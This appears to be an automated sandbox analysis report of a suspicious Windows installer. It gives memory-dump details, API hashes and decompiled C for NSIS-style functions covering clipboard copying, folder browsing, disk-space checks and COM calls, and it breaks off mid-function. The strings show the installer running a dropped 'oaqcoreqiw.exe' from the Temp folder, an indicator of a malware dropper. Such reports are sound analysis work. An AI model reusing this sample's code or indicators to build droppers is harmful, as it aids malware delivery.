                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                  • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                  • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                  • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                  0x00405811
                                                  0x00405817
                                                  0x00405821
                                                  0x00405824
                                                  0x004059ba
                                                  0x004059de
                                                  0x004059de
                                                  0x004059f1
                                                  0x00405a0f
                                                  0x00405a11
                                                  0x00405a19
                                                  0x00405a6f
                                                  0x00405a73
                                                  0x00000000
                                                  0x00000000
                                                  0x00405a75
                                                  0x00405a7b
                                                  0x00000000
                                                  0x00000000
                                                  0x00405a85
                                                  0x00405a8d
                                                  0x00405a90
                                                  0x00405b92
                                                  0x00000000
                                                  0x00405b92
                                                  0x00405a9f
                                                  0x00405aaa
                                                  0x00405ab3
                                                  0x00405abe
                                                  0x00405ac1
                                                  0x00405aca
                                                  0x00405ad0
                                                  0x00405ad3
                                                  0x00405ad3
                                                  0x00405aeb
                                                  0x00405af4
                                                  0x00405af7
                                                  0x00405afe
                                                  0x00405b05
                                                  0x00405b0d
                                                  0x00405b0d
                                                  0x00405b24
                                                  0x00405b24
                                                  0x00405b2b
                                                  0x00405b31
                                                  0x00405b3d
                                                  0x00405b44
                                                  0x00405b4d
                                                  0x00405b4f
                                                  0x00405b52
                                                  0x00405b61
                                                  0x00405b64
                                                  0x00405b6a
                                                  0x00405b6b
                                                  0x00405b71
                                                  0x00405b72
                                                  0x00405b73
                                                  0x00405b7b
                                                  0x00405b86
                                                  0x00405b8c
                                                  0x00405b8c
                                                  0x00000000
                                                  0x00405aeb
                                                  0x00405a21
                                                  0x00405a51
                                                  0x00405a59
                                                  0x00405a64
                                                  0x00405a64
                                                  0x00405a6a
                                                  0x00000000
                                                  0x00405a6a
                                                  0x00405a25
                                                  0x00405a2f
                                                  0x00000000
                                                  0x004059f3
                                                  0x004059f9
                                                  0x00405a34
                                                  0x00000000
                                                  0x00405a3d
                                                  0x00405a02
                                                  0x00405a07
                                                  0x00405a0a
                                                  0x00000000
                                                  0x00405a0a
                                                  0x004059f1
                                                  0x0040582a
                                                  0x0040582e
                                                  0x00405836
                                                  0x0040583a
                                                  0x0040583d
                                                  0x00405840
                                                  0x00405843
                                                  0x00405846
                                                  0x00405847
                                                  0x00405848
                                                  0x00405861
                                                  0x00405864
                                                  0x0040586e
                                                  0x0040587d
                                                  0x00405885
                                                  0x0040588d
                                                  0x00405892
                                                  0x00405895
                                                  0x004058a1
                                                  0x004058aa
                                                  0x004058b3
                                                  0x004058d5
                                                  0x004058db
                                                  0x004058ec
                                                  0x004058f1
                                                  0x004058ff
                                                  0x0040590d
                                                  0x0040590d
                                                  0x00405912
                                                  0x00405920
                                                  0x00405920
                                                  0x00405925
                                                  0x00405928
                                                  0x0040592d
                                                  0x00405939
                                                  0x00405942
                                                  0x0040594f
                                                  0x0040595e
                                                  0x00405951
                                                  0x00405956
                                                  0x00405956
                                                  0x0040596a
                                                  0x0040596a
                                                  0x0040597e
                                                  0x00405987
                                                  0x00405990
                                                  0x004059a0
                                                  0x004059ac
                                                  0x004059ac
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405867
                                                  • GetDlgItem.USER32 ref: 00405876
                                                  • GetClientRect.USER32 ref: 004058B3
                                                  • GetSystemMetrics.USER32 ref: 004058BA
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                  • ShowWindow.USER32(?,00000008), ref: 00405956
                                                  • GetDlgItem.USER32 ref: 00405977
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                  • GetDlgItem.USER32 ref: 00405885
                                                    • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                  • GetDlgItem.USER32 ref: 004059C9
                                                  • CreateThread.KERNEL32 ref: 004059D7
                                                  • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                  • ShowWindow.USER32(00000000), ref: 00405A02
                                                  • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                  • ShowWindow.USER32(00000008), ref: 00405A51
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                  • CreatePopupMenu.USER32 ref: 00405A96
                                                  • AppendMenuW.USER32 ref: 00405AAA
                                                  • GetWindowRect.USER32 ref: 00405ACA
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                  • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                  • EmptyClipboard.USER32 ref: 00405B31
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                  • GlobalLock.KERNEL32 ref: 00405B47
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                  • SetClipboardData.USER32 ref: 00405B86
                                                  • CloseClipboard.USER32 ref: 00405B8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: H7B${
                                                  • API String ID: 590372296-2256286769
                                                  • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                  • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                  • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                  • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                  0x00404ab5
                                                  0x00404abb
                                                  0x00404ac1
                                                  0x00404ace
                                                  0x00404adc
                                                  0x00404adf
                                                  0x00404ae7
                                                  0x00404aed
                                                  0x00404aed
                                                  0x00404af9
                                                  0x00404afc
                                                  0x00404b6a
                                                  0x00404b71
                                                  0x00404c48
                                                  0x00404c4f
                                                  0x00404c5e
                                                  0x00404c5e
                                                  0x00404c62
                                                  0x00404c6c
                                                  0x00404c79
                                                  0x00404c7b
                                                  0x00404c7b
                                                  0x00404c89
                                                  0x00404c90
                                                  0x00404c97
                                                  0x00404c9a
                                                  0x00404cd6
                                                  0x00404cd8
                                                  0x00404cde
                                                  0x00404ce3
                                                  0x00404ce7
                                                  0x00404ce9
                                                  0x00404ce9
                                                  0x00404d05
                                                  0x00000000
                                                  0x00404d07
                                                  0x00404d0a
                                                  0x00404d18
                                                  0x00404d1e
                                                  0x00404d1f
                                                  0x00404d22
                                                  0x00404d25
                                                  0x00000000
                                                  0x00404d25
                                                  0x00404c9c
                                                  0x00404c9e
                                                  0x00404ca2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ca4
                                                  0x00404ca4
                                                  0x00404cb1
                                                  0x00404cb6
                                                  0x00000000
                                                  0x00000000
                                                  0x00404cba
                                                  0x00404cbc
                                                  0x00404cbc
                                                  0x00404cc5
                                                  0x00404cc7
                                                  0x00404ccc
                                                  0x00404ccf
                                                  0x00404cd4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404cd4
                                                  0x00404d31
                                                  0x00404d3b
                                                  0x00404d3e
                                                  0x00404d41
                                                  0x00404d48
                                                  0x00404d48
                                                  0x00404d4a
                                                  0x00404d4a
                                                  0x00404d4f
                                                  0x00404d51
                                                  0x00404d59
                                                  0x00404d60
                                                  0x00404d62
                                                  0x00404d6d
                                                  0x00404d6d
                                                  0x00404d62
                                                  0x00404d7d
                                                  0x00404d87
                                                  0x00404d8f
                                                  0x00404daa
                                                  0x00404d91
                                                  0x00404d9a
                                                  0x00404d9a
                                                  0x00404d8f
                                                  0x00404daf
                                                  0x00404db4
                                                  0x00404db9
                                                  0x00404dc2
                                                  0x00404dc2
                                                  0x00404dcb
                                                  0x00404dcd
                                                  0x00404dcd
                                                  0x00404dd9
                                                  0x00404de1
                                                  0x00404deb
                                                  0x00404deb
                                                  0x00404df0
                                                  0x00000000
                                                  0x00404df0
                                                  0x00404c9a
                                                  0x00404c51
                                                  0x00404c58
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c58
                                                  0x00404b77
                                                  0x00404b80
                                                  0x00404b9a
                                                  0x00404b9f
                                                  0x00404ba9
                                                  0x00404bb0
                                                  0x00404bbc
                                                  0x00404bbf
                                                  0x00404bc2
                                                  0x00404bc9
                                                  0x00404bd1
                                                  0x00404bd4
                                                  0x00404bd8
                                                  0x00404bdf
                                                  0x00404be7
                                                  0x00404c41
                                                  0x00404be9
                                                  0x00404bea
                                                  0x00404bf1
                                                  0x00404bfb
                                                  0x00404c03
                                                  0x00404c10
                                                  0x00404c24
                                                  0x00404c28
                                                  0x00404c28
                                                  0x00404c24
                                                  0x00404c2d
                                                  0x00404c3a
                                                  0x00404c3a
                                                  0x00404be7
                                                  0x00000000
                                                  0x00404b9f
                                                  0x00404b8d
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b93
                                                  0x00000000
                                                  0x00404afe
                                                  0x00404b0b
                                                  0x00404b14
                                                  0x00404b21
                                                  0x00404b21
                                                  0x00404b28
                                                  0x00404b2e
                                                  0x00404b37
                                                  0x00404b3a
                                                  0x00404b3d
                                                  0x00404b45
                                                  0x00404b48
                                                  0x00404b4b
                                                  0x00404b51
                                                  0x00404b58
                                                  0x00404b5f
                                                  0x00404df6
                                                  0x00404e08
                                                  0x00404b65
                                                  0x00404b68
                                                  0x00000000
                                                  0x00404b68
                                                  0x00404b5f

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404B04
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                  • lstrcmpiW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00423748,00000000,?,?), ref: 00404C1C
                                                  • lstrcatW.KERNEL32(?,"C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i), ref: 00404C28
                                                  • SetDlgItemTextW.USER32 ref: 00404C3A
                                                    • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406952
                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406961
                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406966
                                                    • Part of subcall function 004068EF: CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406979
                                                  • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                    • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                    • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                    • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$A$C:\Users\user~1\AppData\Local\Temp$H7B
                                                  • API String ID: 2624150263-2998403876
                                                  • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                  • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                  • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                  • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
